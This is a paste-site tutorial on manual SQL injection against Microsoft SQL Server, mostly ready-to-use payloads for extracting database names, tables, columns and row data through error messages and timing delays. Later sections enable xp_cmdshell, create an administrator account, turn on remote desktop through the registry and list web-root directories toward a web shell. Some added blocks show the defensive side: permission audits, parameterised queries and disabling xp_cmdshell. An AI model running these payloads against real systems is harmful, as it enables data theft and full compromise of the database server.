moemyintshein

Comprehensive SQL Server manual injection Tutorial

Mar 14th, 2017
(1) Get basic information

In the payloads below, %2b is the URL-encoded + (string concatenation) operator and the trailing -- comments out the remainder of the original query; N, The_database_name and "Specified table name" are placeholders.

Determine whether stacked queries are supported:
;declare @d int--
;select count(*) from sysobjects--

Determine whether the web server and the database server are separate hosts:
and 1=(@@servername%2b'|'%2bhost_name())--

Determine whether xp_cmdshell exists:
and 1=(Select count(*) FROM master..sysobjects Where xtype='X' AND name='xp_cmdshell')--

See whether the xp_regread extended stored procedure exists:
and 1=(select count(*) FROM master..sysobjects where name='xp_regread')--

Extract the database version:
and 1=@@version--

Extract the host name:
and 1=host_name()--

Extract the local server name:
and 1=@@servername--

Extract the current database name:
and 1=quotename(db_name())--
and 1=db_name()%2b'|'--

(2) Get user and privilege information

Extract the current database user:
and 1=user--
and 1=quotename(user)--

Get the current database permissions:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(Select IS_MEMBER('db_owner'))
and 1=(select IS_SRVROLEMEMBER('public'))
and 1=(Select HAS_DBACCESS('database'))

The following functions only exist on SQL Server 2005 and above:
and 1=has_perms_by_name(db_name(),'DATABASE','ANY')
and 1=has_perms_by_name('master','DATABASE','ANY')
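The permission functions the paste evaluates through the injection point are the same ones a DBA can run from the other side to find out what an application login would be able to reach. The block below is an added example and not part of the original paste; it assumes a login named webapp_login, an application database AppDb and a mapped database user webapp_user, and the EXECUTE AS LOGIN step requires IMPERSONATE permission on that login (sysadmin has it).

```sql
-- Added example (not part of the original paste). Audits what the web
-- application's SQL login can do, using the same functions the injection
-- payloads above call. Assumed names: login webapp_login, database AppDb,
-- database user webapp_user.

-- Server-level role membership of the login. A sysadmin hit here means every
-- technique in sections (9) and (10) would work through the injection point.
SELECT r.name AS server_role, m.name AS member
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE m.name = N'webapp_login';

-- Database-level role membership of the mapped user in the application database.
USE AppDb;
SELECT r.name AS database_role, m.name AS member
FROM sys.database_role_members AS rm
JOIN sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals AS m ON m.principal_id = rm.member_principal_id
WHERE m.name = N'webapp_user';

-- Evaluate the permission functions in the login's own security context.
-- EXECUTE AS LOGIN needs IMPERSONATE on that login; REVERT restores the caller.
EXECUTE AS LOGIN = N'webapp_login';
SELECT SUSER_SNAME()                                   AS effective_login,
       IS_SRVROLEMEMBER('sysadmin')                    AS is_sysadmin,
       IS_MEMBER('db_owner')                           AS is_db_owner,
       HAS_DBACCESS('master')                          AS can_access_master,
       HAS_PERMS_BY_NAME('master', 'DATABASE', 'ANY')  AS any_perm_on_master,
       HAS_PERMS_BY_NAME('master.dbo.xp_cmdshell', 'OBJECT', 'EXECUTE')
                                                       AS can_run_xp_cmdshell;
REVERT;
```

The expected result for a web application login is a row set with no server roles, membership only in the specific database roles the application needs (not db_owner), and 0 for is_sysadmin and can_run_xp_cmdshell; anything else is what the sections below would exploit.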

(3) Get database information

Number of all databases:
and 1=(select quotename(count(name)) from master..sysdatabases)--
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases)--
and 1=(select str(count(name))%2b'|' from master..sysdatabases)--

Number of user databases:
and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--
and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5)--
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5)--

Extract the databases one by one (N is the database id):
and 1=quotename(db_name(N))--
and 1=db_name(N)%2b'|'--
and 1=(select name%2b'|' from master..sysdatabases where dbid=5)--
and 1=(select name%2bchar(1) from master..sysdatabases where dbid=5)--
and 1=(select top 1 quotename(name) from master..sysdatabases where dbid not in(select top N dbid from master..sysdatabases))--

Extract all databases at once (SQL Server 2005 and above only):
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--

FOR XML PATH turns the whole result set into a single XML string, so the complete list comes back in one error message. If the error "String or binary data would be truncated. The statement has been terminated." appears, the result is too large for one message; use the substring function to extract it in several pieces. Alternatively:
and 1=(select name from master..sysdatabases FOR XML RAW)--
and 1=(select name from master..sysdatabases FOR XML Auto)--

(4) Get the table information in the database

Number of tables in the specified database:
and 1=(select quotename(count(*)) from The_database_name..sysobjects where xtype='U')--
and 1=(select cast(count(*) as varchar)%2b'|' from The_database_name..sysobjects where xtype='U')--
and 1=(select cast(count(*) as varchar)%2bchar(1) from The_database_name..sysobjects where xtype=0x55)--

Extract the tables of the specified database one by one:
and 0<>(select top 1 quotename(name) from The_database_name..sysobjects where xtype='U' and Exclusion_criteria)--
and 1=convert(int,(select top 1 table_name from information_schema.tables))--
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('xxxx')))--

Extract all tables of a database at once (SQL Server 2005 and above only):
and 1=(select quotename(name) from The_database_name..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from The_database_name..sysobjects where xtype='U' FOR XML PATH(''))--

(5) Get the column information of a database table

Number of columns in the specified table:
and 1=(select quotename(count(name)) from The_database_name..syscolumns where id=(select id from The_database_name..sysobjects where name='Specified table name'))--
and 1=(select cast(count(name) as varchar)%2bchar(1) from The_database_name..syscolumns where id=(select id from The_database_name..sysobjects where name='Specified table name'))--

Extract the columns of the specified table one by one (N is the column id):
and 1=(select top 1 quotename(col_name(object_id('Specified table name'),N)) from The_database_name..sysobjects)--
and 1=(select quotename(name) from The_database_name..syscolumns where id=(select id from The_database_name..sysobjects where name='Specified table name') and colid=N)--
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Specified table name'))--
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Specified table name' and column_name not in('Known column name')))--

Extract all columns of the specified table at once (SQL Server 2005 and above only):
and 1=(select quotename(name) from The_database_name..syscolumns where id=(select id from The_database_name..sysobjects where name='Specified table name') FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from The_database_name..syscolumns where id=(select id from The_database_name..sysobjects where name='Specified table name') FOR XML PATH(''))--

(6) Retrieve data

Number of records in the specified table:
and 1=(select quotename(count(*)) from "Specified database".."Specified table name")--
and 1=(select cast(count(*) as varchar)%2b'|' from "Specified database".."Specified table name")--

Extract the data of the specified columns row by row:
and 1=(select top 1 quotename("Specified column name 1")%2bquotename("Specified column name 2") from "Specified database".."Specified table name" where "Exclusion criteria")--
and 1=(select top 1 cast("Specified column name 1" as varchar)%2b'|'%2bcast("Specified column name 2" as varchar) from "Specified database".."Specified table name" where "Exclusion criteria")--

Extract all fields of the specified table row by row (SQL Server 2005 and above only):
and 1=(select top 1 * from "Specified database".."Specified table name" where "Exclusion criteria" FOR XML PATH(''))--

Extract all fields of N rows at once (SQL Server 2005 and above only):
and 1=(select top N * from "Specified database".."Specified table name" FOR XML PATH(''))--
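Every payload in sections (1) to (6), and the Insert/Update/Delete/Order By variants that follow, relies on two things: user input being spliced into the statement text, and the engine's error message being returned to the client. The block below is an added example, not code from the original paste; it shows the vulnerable pattern beside two safe replacements. It assumes the dbo.users(uid, uname, upass) table the paste uses in section (7), an error-logging table dbo.app_error_log that the block creates, and SQL Server 2016 SP1 or later for CREATE OR ALTER.

```sql
-- Added example (not part of the original paste). Assumed schema:
-- dbo.users(uid int, uname, upass), as used in section (7).

-- Vulnerable: @uid_text is concatenated into the statement text. An input of
--   1 and 1=convert(int,@@version)--
-- becomes part of the WHERE clause, and the conversion error carries @@version
-- back to the caller. This is the error-based channel used in sections (1)-(6).
CREATE OR ALTER PROCEDURE dbo.GetUser_Unsafe @uid_text nvarchar(200)
AS
BEGIN
    DECLARE @sql nvarchar(max) =
        N'SELECT uname FROM dbo.users WHERE uid = ' + @uid_text;
    EXEC (@sql);
END;
GO

-- Safe: the value is a typed parameter and is never parsed as SQL, so the
-- error-based, boolean and waitfor delay variants all fail the same way.
CREATE OR ALTER PROCEDURE dbo.GetUser_Safe @uid int
AS
BEGIN
    SELECT uname FROM dbo.users WHERE uid = @uid;
END;
GO

-- Server-side error log (assumed, created here so the block is self-contained).
IF OBJECT_ID(N'dbo.app_error_log', 'U') IS NULL
    CREATE TABLE dbo.app_error_log (
        id        int IDENTITY(1,1) PRIMARY KEY,
        logged_at datetime2       NOT NULL,
        msg       nvarchar(4000)  NOT NULL);
GO

-- Safe even when the statement must be built dynamically (here: a variable
-- table name). The identifier is checked against the catalog and wrapped in
-- QUOTENAME; data values still travel as sp_executesql parameters. Engine
-- errors are logged server-side and replaced by a generic message, so nothing
-- from the engine (@@version, object names, conversion failures) reaches the
-- client, which closes the error-based channel even if a bug slips through.
CREATE OR ALTER PROCEDURE dbo.GetUserFromTable_Safe @table sysname, @uid int
AS
BEGIN
    BEGIN TRY
        IF OBJECT_ID(N'dbo.' + QUOTENAME(@table), 'U') IS NULL
            THROW 50001, N'Unknown table', 1;
        DECLARE @sql nvarchar(max) =
            N'SELECT uname FROM dbo.' + QUOTENAME(@table) + N' WHERE uid = @uid;';
        EXEC sp_executesql @sql, N'@uid int', @uid = @uid;
    END TRY
    BEGIN CATCH
        INSERT INTO dbo.app_error_log (logged_at, msg)
        VALUES (SYSUTCDATETIME(), ERROR_MESSAGE());
        THROW 50002, N'Request failed', 1;
    END CATCH;
END;
GO

-- Usage: the same request through the two safe procedures.
EXEC dbo.GetUser_Safe @uid = 1;
EXEC dbo.GetUserFromTable_Safe @table = N'users', @uid = 1;
```

The application side should do the same as the last procedure: log the full exception and return a generic error, because the conversion trick above only works when the raw engine message is echoed to the HTTP client.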

(7) Insert, Update, Delete, Order By, Group By and Top injection

Insert:
insert into users values('vk',convert(int,@@version))--,'123')
insert into users values('vk','123'+convert(int,@@version))--')
insert into users values('vk','123') if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2--')

Update:
update users set uname='vvvk',upass='11111' where uid=1 and 1=convert(int,@@version)
update users set uname='vvvk',upass='11111'+convert(int,@@version)+'' where uid=1
update users set uname='vvvk',upass='11111' where uid=1 if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

Delete:
Delete from users where uid=9+convert(int,@@version)
Delete from users where uid=9 and 1=convert(int,@@version)
Delete from users where uid=9 if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

Order By:
select * from users order by uid,convert(int,@@version)
select * from users order by uid+convert(int,@@version)
select * from users order by uid if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

Group By:
select count(uid),uname from users group by uid,uname union select '1','2'
select count(uid),uname from users group by uid,uname,uname+convert(int,@@version)
select count(uid),uname from users group by uid,uname if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

Top:
select top 1 @@version,* from users
select top 0 1 from sysobjects union select @@version--,* from users

(8) Use of stored procedures

Commonly used extended stored procedures:
xp_cmdshell -- executes operating system commands directly
xp_regread -- reads the registry
xp_regwrite -- writes to the registry
xp_dirtree -- lists a directory
xp_enumdsn -- enumerates ODBC data sources
xp_loginconfig -- reports the server's login security mode

Check whether a given stored procedure exists:
and 1=(Select count(*) from master..sysobjects where xtype='X' and name='Stored procedure name')--

(9) Use xp_cmdshell

Check whether xp_cmdshell exists:
and 1=(Select count(*) from master..sysobjects where xtype='X' and name='xp_cmdshell')--

Remove xp_cmdshell:
;exec sp_dropextendedproc 'xp_cmdshell'--

Enable xp_cmdshell (requires stacked query support):
;EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'--
;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE--

Use xp_cmdshell to execute system commands:
;exec master..xp_cmdshell "System command"--

(10) Post-exploitation with different permission levels

SA permissions:
+ If remote desktop is enabled on the target server, create a system account with a password directly, log in remotely and gain access to the target server (%26%26 is the URL-encoded &&):
;exec master..xp_cmdshell "net user account password /add %26%26 net localgroup administrators account /add"--
+ If remote desktop is not enabled on the target server, enable it with the following command:
;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

DB_OWNER permissions:
The main idea is to list the directory, then back up to get a shell.

1. Find the physical path of the web root:
;create table temp (dir nvarchar(255),depth varchar(255),files varchar(255),id int not null identity (1,1));--

Create a table with four fields: the first three store the result set returned by the stored procedure xp_dirtree, and the id field makes it easy to query a specific entry.
;insert into temp (dir,depth,files) exec master..xp_dirtree 'Absolute path of the directory to browse',1,1--

Use xp_dirtree to insert the files and folders of the specified path into the table.
and 1=(select quotename(dir) from temp where id=1)--

By enumerating the id value, read out the file and directory names saved in the temporary table one at a time.
and 1=(select quotename(dir) from temp FOR XML PATH(''))--

Read out all the files and directories stored in the table at once. SQL Server 2005 and above only.

Clean up the temporary table:
;drop table temp;--
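Sections (8) to (10) all depend on server-wide state: whether xp_cmdshell is enabled and which principals may execute the extended procedures. The block below is an added example written from the DBA side, not part of the original paste; it is run as sysadmin, assumes no names beyond the built-in extended procedures listed in section (8), and reverses the enabling sequence from section (9).

```sql
-- Added example (not part of the original paste). Checks and reverses the
-- server settings that sections (8)-(10) rely on. Run as sysadmin.

-- 1. Running state of the relevant options. value_in_use is the active value;
--    value is the pending one that sp_configure sets before RECONFIGURE.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');

-- 2. Turn xp_cmdshell off and hide the advanced options again. This is the exact
--    reverse of the sequence in section (9). sp_configure needs ALTER SETTINGS
--    (held by sysadmin and serveradmin), so an application login outside those
--    roles cannot undo it through the injection point.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

-- 3. Who may execute the extended procedures from section (8)? The db_owner
--    technique in section (10) only needs EXECUTE on xp_dirtree, so a grant to
--    public or to the application's user is the thing to look for.
USE master;
SELECT o.name                    AS procedure_name,
       ISNULL(pr.name, '(none)') AS grantee,
       pe.permission_name,
       pe.state_desc
FROM sys.all_objects AS o
LEFT JOIN sys.database_permissions AS pe
       ON pe.class = 1 AND pe.major_id = o.object_id
LEFT JOIN sys.database_principals AS pr
       ON pr.principal_id = pe.grantee_principal_id
WHERE o.type = 'X'
  AND o.name IN ('xp_cmdshell', 'xp_regread', 'xp_regwrite',
                 'xp_dirtree', 'xp_enumdsn', 'xp_loginconfig')
ORDER BY o.name, grantee;

-- 4. Revoke directory listing from public when the application does not need it
--    (many installs grant EXECUTE on xp_dirtree to public).
REVOKE EXECUTE ON dbo.xp_dirtree FROM public;

-- 5. Fail loudly if anything re-enabled xp_cmdshell after step 2; suitable for a
--    scheduled job whose failure is alerted on.
IF EXISTS (SELECT 1 FROM sys.configurations
           WHERE name = 'xp_cmdshell' AND value_in_use = 1)
    RAISERROR ('xp_cmdshell is enabled on this instance', 16, 1);
```

Step 3 is also the quickest way to confirm the paste's first check in section (9): if the application's user does not appear as a grantee on xp_cmdshell and is not sysadmin, the "Use xp_cmdshell" payloads fail regardless of whether the option is switched on.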